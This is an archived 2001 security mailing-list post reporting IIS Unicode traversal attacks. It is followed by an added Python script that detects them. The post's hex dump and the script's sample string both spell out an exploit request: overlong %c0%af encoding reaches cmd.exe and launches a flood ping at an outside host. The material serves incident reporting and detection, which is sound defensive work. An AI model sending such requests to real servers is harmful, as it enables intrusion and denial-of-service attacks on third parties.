Security Incidents mailing list archives
Strange IIS Unicode
From: "Yoann LeCorvic" <Yoann.LeCorvic () infrasoft-civil com>
Date: Fri, 25 May 2001 09:22:14 +0000
Hi,

In the past month I get quite a few IIS Unicode attacks, but a bit strange. They come from a bit everywhere, and are very similar. It tries to use the vulnerability to ping other machines.

47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25   c0%af..%c0%af..%
63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25   c0%af..%c0%af..%
63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25   c0%af..%c0%af..%
63 30 25 61 66 2E 2E 25 63 30 25 61 66 2F 77 69   c0%af..%c0%af/wi
6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64   nnt/system32/cmd
2E 65 78 65 3F 2F 63 25 32 30 70 69 6E 67 25 32   .exe?/c%20ping%2
30 2D 76 25 32 30 74 69 6D 65 73 74 61 6D 70 2D   0-v%20timestamp-
72 65 70 6C 79 25 32 30 2D 6E 25 32 30 39 39 39   reply%20-n%20999
39 39 39 39 39 39 39 39 39 39 39 25 32 30 2D 6C   99999999999%20-l
25 32 30 36 35 35 30 30 25 32 30 2D 77 25 32 30   %2065500%20-w%20
30 25 32 30 64 75 6E 67 65 6F 6E 66 79 72 65 2E   0%20dungeonfyre.
66 78 63 68 61 74 2E 6E 65 74 0D 0A               fxchat.net..

This could be used for DDOS as the number of packets is high, as well as the size? Watch out...

Yoann Le Corvic - Internet Administrator
Email : yoann.lecorvic () infrasoft-civil com
Web : http://www.infrasoft-civil.com/
========================
Infrasoft Ltd
North Heath Lane
Horsham, West Sussex
RH12 5QE
United Kingdom
Tel : +44 (0)1403 259511
Fax : +44 (0)1403 217728
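Added example, not part of the original post: a Python check that a defender could run over web server request lines to flag the pattern captured above. It folds overlong two-byte UTF-8 forms such as %c0%af back to the ASCII character they stand for, tests whether the path climbs above the web root, and pulls out the ping count and size. The function names and the benign sample request are assumptions made for this illustration.

```python
import re
from urllib.parse import unquote, unquote_to_bytes

def fold_overlong(raw: bytes):
    """Decode path bytes, folding overlong 2-byte UTF-8 forms (lead byte
    0xC0/0xC1) to the ASCII character they stand for, e.g. C0 AF -> '/'."""
    out, hits, i = [], [], 0
    while i < len(raw):
        b = raw[i]
        nxt = raw[i + 1] if i + 1 < len(raw) else 0
        if b in (0xC0, 0xC1) and nxt & 0xC0 == 0x80:
            ch = chr(((b & 0x1F) << 6) | (nxt & 0x3F))
            hits.append((f"%{b:02x}%{nxt:02x}", ch))
            out.append(ch)
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out), hits

def analyze(request_line: str) -> dict:
    """Classify one HTTP request line (as logged or captured)."""
    target = request_line.strip().split(" ")[1]
    path, _, query = target.partition("?")
    decoded, overlong = fold_overlong(unquote_to_bytes(path))
    depth, escapes_root, segments = 0, False, []
    for seg in decoded.replace("\\", "/").split("/"):
        if seg == "..":
            depth -= 1                      # one level up
            escapes_root = escapes_root or depth < 0
        elif seg not in ("", "."):
            depth += 1
            segments.append(seg)
    command = unquote(query)
    flags = dict(re.findall(r"-(\w)\s+(\S+)", command))
    return {
        "overlong": overlong,
        "escapes_root": escapes_root,
        "leaf": segments[-1].lower() if segments else "",
        "command": command,
        "ping_count": int(flags["n"]) if flags.get("n", "").isdigit() else None,
        "ping_size": int(flags["l"]) if flags.get("l", "").isdigit() else None,
        "suspicious": bool(overlong) or escapes_root,
    }

# Request line from the capture in the post above (trailing CRLF dropped).
CAPTURED = ("GET /scripts/" + "..%c0%af" * 8 + "/winnt/system32/cmd.exe"
            "?/c%20ping%20-v%20timestamp-reply%20-n%20" + "9" * 14 +
            "%20-l%2065500%20-w%200%20dungeonfyre.fxchat.net")
# Constructed benign request for comparison (valid UTF-8, no traversal).
BENIGN = "GET /scripts/search.asp?q=caf%C3%A9 HTTP/1.0"
```
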